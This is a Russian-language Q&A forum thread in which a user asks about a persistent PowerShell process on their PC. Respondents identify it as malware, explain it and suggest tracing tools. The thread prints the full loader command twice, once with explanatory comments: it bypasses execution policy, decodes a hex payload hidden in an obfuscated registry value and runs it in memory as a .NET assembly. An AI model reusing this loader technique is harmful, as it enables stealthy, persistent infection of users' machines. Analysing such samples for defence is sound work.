@Nordman99

Что бы значил такой процесс?

Всем привет, подскажите, застукал у себя на компе процесс павершелла запущенный с такими параметрами:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -noexit -Command "function DE0PB([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci' -name 'dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci').dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci;$_b=$_b.replace('Р•','E');[byte[]]$_0 = DE0PB($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"

Если его прибить то после перезагрузки он запускается снова, отследить что его запускает не могу - нигде ни в какой автозагрузке не вижу никого скрипта запуска этого процесса, поиск по всему реестру по записи powrshell.exe тоже результатов не дал, записи о powershell.exe есть но не с такими параметрами запуска, утилита autoruns.exe из Sysinternals тоже ничего не показала, в планировщике задач тоже не увидел ничего запускающего павершелл с такими параметрами, подскажите какие еще есть способы выяснить что запускает этот процесс павершелла?
И самое главное - что весь этот процесс с этими параметрами значит комуто это чтото говорит?
Очень смахивает на нездоровую вирусную активность, вроде Защитник Винды стоит и работает
  • Вопрос задан
  • 319 просмотров
Решения вопроса 1
@azarij
В меру опытный никто
да, какую-то заразу поймали:
https://www.joesandbox.com/analysis/188751/1/html
я бы не искал откуда оно, а отформатировал систему и начал бы с нуля. отличный повод.
поискать можно, конечно, и почистить, но где гарантия, что вычистите на 100%?
Ответ написан
Пригласить эксперта
Ответы на вопрос 3
@alhaos
function DE0PB([string]$s) {
   $H = @()
   for ($i = 0; $i -lt $s.Length; $i += 2) {
      $H += [Byte]::Parse($s.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber);
   };
   return $H; 
};
# функция распарсивает строку записаную hex симвалами по два в байты
$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci' -name 'dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci').dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci;
# зачение ключа реестра в $_b
$_b = $_b.replace('Р•', 'E');
# замена в нем Р• на E
[byte[]]$_0 = DE0PB($_b);
# строковое значение распарсивается на байты
$_1 = [System.Threading.Thread]::GetDomain().Load($_0); $_1.EntryPoint.invoke($null, $null);
# тут она запускается )))
Ответ написан
CityCat4
@CityCat4 Куратор тега Информационная безопасность
Если я чешу в затылке - не беда!
Если вдруг на твой компьютер просочился злобный вирус...
Ответ написан
HemulGM
@HemulGM
Delphi Developer, сис. админ
У каждого процесса есть родитель. Запусти ProcMon и посмотри.
Помимо автозагрузки есть Планировщик задач
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы